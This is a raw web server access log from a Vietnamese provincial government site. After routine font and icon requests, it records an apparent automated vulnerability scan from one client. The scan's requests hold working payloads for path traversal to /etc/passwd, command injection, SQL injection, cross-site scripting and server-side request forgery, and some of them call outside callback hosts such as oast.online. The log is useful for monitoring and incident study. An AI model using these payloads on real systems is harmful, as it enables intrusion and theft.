2023-10-13 19:05:11 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 819
2023-10-13 19:05:14 103.153.214.94 GET /Avenir_Next_W00_Italic_400.ttf - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1369
2023-10-13 19:05:16 103.153.214.94 GET /Avenir_Next_W00_Italic_400.svg - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2181
2023-10-13 19:05:16 103.153.214.94 GET /Avenir_Next_W00_600.eot - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 276
2023-10-13 19:05:16 103.153.214.94 GET /Avenir_Next_W00_600.woff2 - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 276
2023-10-13 19:05:18 103.153.214.94 GET /Avenir_Next_W00_600.woff - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 889
2023-10-13 19:05:20 103.153.214.94 GET /Avenir_Next_W00_600.ttf - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2591
2023-10-13 19:05:24 103.153.214.94 GET /Avenir_Next_W00_600.svg - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2730
2023-10-13 19:05:24 103.153.214.94 GET /Avenir_Next_W00_Italic_600.eot - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 546
2023-10-13 19:05:25 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff2 - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 545
2023-10-13 19:05:25 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 547
2023-10-13 19:05:27 103.153.214.94 GET /Avenir_Next_W00_Italic_600.ttf - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1091
2023-10-13 19:05:31 103.153.214.94 GET /Avenir_Next_W00_Italic_600.svg - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3956
2023-10-13 19:05:32 103.153.214.94 GET /CalciteWebCoreIcons.ttf iz9r4h 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1396
2023-10-13 19:05:32 103.153.214.94 GET /CalciteWebCoreIcons.woff iz9r4h 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 818
2023-10-13 19:05:36 103.153.214.94 GET /CalciteWebCoreIcons.svg iz9r4h 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2620
2023-10-13 19:05:36 103.153.214.94 GET /basemap-toggle-64.svg - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 274
2023-10-13 19:05:38 103.153.214.94 GET /loading-throb.gif - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1552
2023-10-13 19:05:38 103.153.214.94 GET /search.svg - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 275
2023-10-13 19:05:38 103.153.214.94 GET /helpIcon.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 274
2023-10-13 19:05:39 103.153.214.94 GET /search32.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 272
2023-10-13 19:05:39 103.153.214.94 GET /transparent-bg.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 274
2023-10-13 19:05:39 103.153.214.94 GET /slider-handle.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:40 103.153.214.94 GET /raster-symbology-editor-stretch-type-min-max.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:40 103.153.214.94 GET /raster-symbology-editor-stretch-type-none.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:40 103.153.214.94 GET /raster-symbology-editor-stretch-type-standard-deviation.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:41 103.153.214.94 GET /raster-symbology-editor-stretch-type-percent-clip.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:41 103.153.214.94 GET /raster-symbology-editor-band-combination-natural-color.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:41 103.153.214.94 GET /raster-symbology-editor-band-combination-land-water.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:42 103.153.214.94 GET /raster-symbology-editor-band-combination-landuse.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:42 103.153.214.94 GET /raster-symbology-editor-band-combination-bathymetric.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:42 103.153.214.94 GET /raster-symbology-editor-band-combination-vegetation.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:43 103.153.214.94 GET /raster-symbology-editor-band-combination-color-infrared.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:43 103.153.214.94 GET /raster-symbology-editor-symbology-type-rgb.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 276
2023-10-13 19:05:43 103.153.214.94 GET /raster-symbology-editor-symbology-type-stretch.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 274
2023-10-13 19:05:44 103.153.214.94 GET /raster-symbology-editor-symbology-type-unique-value.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:44 103.153.214.94 GET /raster-symbology-editor-symbology-type-discrete.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:44 103.153.214.94 GET /handles.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:45 103.153.214.94 GET /Loading_Indicator_double_32.svg - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:48 103.153.214.94 GET /manager-manager-module-ngfactory-es5.js - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 56175
2023-10-13 19:05:51 103.153.214.94 GET /favicon.ico - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 5516
2023-10-13 19:11:04 103.153.214.94 GET /boafrm/formWlanRedirect redirect-url=http://interact.sh&wlan_id=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 211
2023-10-13 19:12:03 103.153.214.94 POST /apply.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 208
2023-10-13 19:12:41 103.153.214.94 GET /Forms/rpAuth_1 id=</form><iMg%20src=x%20onerror="prompt(document.domain)"><form> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 210
2023-10-13 19:13:26 103.153.214.94 GET /cgi-bin/tsaupload.cgi file_name=../../../../../..//etc/passwd&password 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 210
2023-10-13 19:13:34 103.153.214.94 GET / - 443 - 52.167.144.174 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 475
2023-10-13 19:14:22 103.153.214.94 GET /cgi-bin/admin.cgi Command=sysCommand&Cmd=ping${IFS}-c${IFS}1${IFS}ckjv7uic8b6p3donsoogi9zxmec57j1uh.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 230
2023-10-13 19:14:44 103.153.214.94 GET / - 443 - 205.210.31.141 - - 200 0 0 342
2023-10-13 19:16:50 103.153.214.94 GET /api/ping/;`id` - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 3005
2023-10-13 19:16:52 103.153.214.94 POST /wp-admin/admin.php page=vfb-export 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn/wp-admin/admin.php?page=vfb-export 405 0 1 205
2023-10-13 19:18:38 103.153.214.94 GET /images/icons_title.gif - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 208
2023-10-13 19:18:42 103.153.214.94 DELETE /images/icons_title.gif - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 893
2023-10-13 19:18:45 103.153.214.94 GET /images/icons_title.gif - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 203
2023-10-13 19:19:32 103.153.214.94 GET / wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 229
2023-10-13 19:19:34 103.153.214.94 GET /wp-admin/admin-ajax.php action=kc_get_thumbn&id=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 217
2023-10-13 19:19:47 103.153.214.94 GET /wp-admin/admin-ajax.php action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5(999999999),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 230
2023-10-13 19:20:53 103.153.214.94 GET /index.php p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 221
2023-10-13 19:22:03 103.153.214.94 POST /wp-login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 221
2023-10-13 19:22:05 103.153.214.94 GET /wp-admin/admin.php page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 216
2023-10-13 19:26:39 103.153.214.94 GET / mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 228
2023-10-13 19:27:41 103.153.214.94 GET /wp-admin/admin-ajax.php action=window&callback=</script><img/src/onerror=alert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 226
2023-10-13 19:27:45 103.153.214.94 GET /index.php rest_route=/whm/v3/themesettings 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 19:28:31 103.153.214.94 GET /wp-admin - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 217
2023-10-13 19:28:57 103.153.214.94 GET /wp-admin/admin-ajax.php action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 209
2023-10-13 19:31:26 103.153.214.94 GET /wp-admin/admin-ajax.php action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 225
2023-10-13 19:33:12 103.153.214.94 GET /api/users/search_authors - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 0 2 254
2023-10-13 19:33:59 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 229
2023-10-13 19:35:12 103.153.214.94 GET / p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 227
2023-10-13 19:35:14 103.153.214.94 GET / p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 223
2023-10-13 19:35:40 103.153.214.94 POST / rest_route=/notificationx/v1/analytics 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 219
2023-10-13 19:36:16 103.153.214.94 GET /module/ module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 229
2023-10-13 19:37:44 103.153.214.94 GET /wp-content/plugins/embed-swagger/swagger-iframe.php url=xss://%22-alert(document.domain)-%22 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 217
2023-10-13 19:37:59 103.153.214.94 GET / rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 217
2023-10-13 19:38:09 103.153.214.94 GET /user/login - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 223
2023-10-13 19:40:04 103.153.214.94 POST /wp-login.php wlcms-action=preview 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 221
2023-10-13 19:40:41 103.153.214.94 GET /embed.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 219
2023-10-13 19:41:23 103.153.214.94 GET / rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 227
2023-10-13 19:42:08 103.153.214.94 GET /karma.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 217
2023-10-13 19:42:10 103.153.214.94 GET / return_url=javascript:alert(document.domain) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 212
2023-10-13 19:47:25 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 221
2023-10-13 19:47:29 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 225
2023-10-13 19:48:22 103.153.214.94 GET /InsightPluginShowGeneralConfiguration.jspa; - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209
2023-10-13 19:50:57 103.153.214.94 GET /wp-admin/admin-ajax.php action=formcraft3_get&URL=https://ckjv7uic8b6p3donsoogo3w14h41dpj19.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 211
2023-10-13 19:52:51 103.153.214.94 GET /wp-admin/admin-ajax.php action=shareaholic_debug_info 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 207
2023-10-13 19:55:51 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 211
2023-10-13 19:55:53 103.153.214.94 GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2WfF0m8tYZpjTsMFQ48dSquQGo3.svg - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 206
2023-10-13 19:56:02 103.153.214.94 GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 205
2023-10-13 19:56:29 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 204
2023-10-13 19:59:58 103.153.214.94 GET /demo/api/logout redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 210
2023-10-13 20:00:27 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 207
2023-10-13 20:00:43 103.153.214.94 GET /index.php/interact.sh - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 205
2023-10-13 20:01:06 103.153.214.94 GET /wp-admin/admin-ajax.php meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 208
2023-10-13 20:01:44 103.153.214.94 GET /users/sign_in - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207
